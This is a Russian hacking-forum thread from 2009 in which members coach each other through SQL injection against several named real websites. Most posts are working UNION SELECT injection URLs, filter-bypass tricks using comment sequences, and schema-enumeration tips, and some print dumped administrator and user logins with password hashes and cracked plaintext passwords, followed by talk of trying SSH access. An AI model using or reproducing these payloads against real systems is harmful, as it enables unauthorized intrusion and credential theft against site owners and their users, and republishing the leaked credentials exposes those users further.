Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.03.2009, 03:59
|
|
Новичок
Регистрация: 13.03.2009
Сообщений: 2
Провел на форуме:
4075
Репутация:
0
|
|
Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц? То есть когда я использовал table_name, было около 50 таблиц! Админ мог использовать какое-нибуть "левое" название для нужной мне таблицы, а найденную мной сделать "фейком"??
Последний раз редактировалось EmIL; 14.03.2009 в 04:02..
|
|
|
14.03.2009, 04:00
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
У меня такой же вопрос как и у Tigger, если какой то способ кроме /**/ заменить пробелы, а то при чпу выходит фигня -
http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'/
? И почему вот такой финт не проходит
http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'%2f**%2forder%2f**%2fby%2f **%2f1/
@EmIL
test.jos_users=>id
test.jos_users=>name
test.jos_users=>username
test.jos_users=>email
test.jos_users=>password
test.jos_users=>usertype
test.jos_users=>block
test.jos_users=>sendEmail
test.jos_users=>gid
test.jos_users=>registerDate
test.jos_users=>lastvisitDate
test.jos_users=>activation
test.jos_users=>params
Иногда БД test просто фейк
Последний раз редактировалось PaCo; 14.03.2009 в 04:36..
|
|
|
|
14.03.2009, 04:14
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,us ername,password,email),10,11,12,13,14,15,16,17,18, 19,20+from+test.jos_users
|
|
|
|
14.03.2009, 04:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от EmIL
Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц?
1) ДБ узнается через table_schema
2) Можно искать таблицы по именам полей, т.е. ПРИМЕР: 1,2,table_name,4,5+from+information_schema.tables+ where+column_name+like+'%user%'.
|
|
|
|
14.03.2009, 04:24
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от Tigger
У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,version(),5,6,7/*
смотрим свойста имега(путь к картинке)
версия 5.0.21
Последний раз редактировалось S00pY; 14.03.2009 в 04:26..
|
|
|
|
14.03.2009, 04:35
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 Tigger
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/UNION/**/SELECT/**/1,2,3,(SELECT/**/CONCAT_WS(0x3a,u_login,u_password)/**/FROM/**/kronverk.0users/**/LIMIT/**/1,1),5,6,7/*
[0]:0admin:cb9bfe903a233a5e3e5db91f557efa49
[1]:user1:ae1276475fe133abcc93dff6bebc9413
Пароль не найден в паблик базе,
на passcracking.ru не найден
|
|
|
|
14.03.2009, 04:52
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,concat_ws(0x3a,id,u_login,u_password),5,6,7/**/from/**/0users/* - докрутил сам уж тут)
0admin:cb9bfe903a233a5e3e5db91f557efa49:vjhrjlfd
user1:ae1276475fe133abcc93dff6bebc9413:kronverk123
Вот так вот =)
Но к сожелению к /admin/ доступ запрещен =(
И фтп нету =(
Сейчас попробую через ssh и удаленно к БД можно попробывать
ЗЫ: Всем спасибо за помощь)
|
|
|
|
14.03.2009, 08:59
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
http://adena.ru/checkout.html?id=1'
Не могу, решил выложить...
Последний раз редактировалось Byrger; 14.03.2009 в 10:41..
|
|
|
|
14.03.2009, 09:05
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://striweb.si.edu/esp/tesp/details.php?id=-1378+or+1=1/*
думаю 3 ветка. ( пр9
|
|
|
|
14.03.2009, 10:32
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
http://striweb.si.edu/esp/tesp/details.php?id=-1378+or+1=1/*
думаю 3 ветка. ( пр9
Ну да..
Код:
http://striweb.si.edu/esp/tesp/details.php?id=1378+and+substring(version(),1,1)=3
Код:
http://adena.ru/checkout.html?id=1'
Не могу, решил выложить...
http://adena.ru/checkout.html?id=1'+and+substring(version(),1,1)=5/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
